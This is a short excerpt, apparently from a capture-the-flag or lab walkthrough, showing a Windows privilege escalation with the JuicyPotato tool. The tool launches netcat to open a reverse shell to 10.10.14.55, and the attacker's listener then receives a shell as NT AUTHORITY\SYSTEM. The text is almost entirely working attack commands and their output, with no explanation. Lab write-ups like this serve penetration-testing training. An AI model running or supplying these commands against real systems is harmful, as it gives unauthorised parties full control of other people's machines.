c:\TEMP>.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
Testing {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381} 1337
......
[+] authresult 0
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\TEMP>

```

```bash
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9005
Ncat: Listening on 0.0.0.0:9005
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49979.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

```

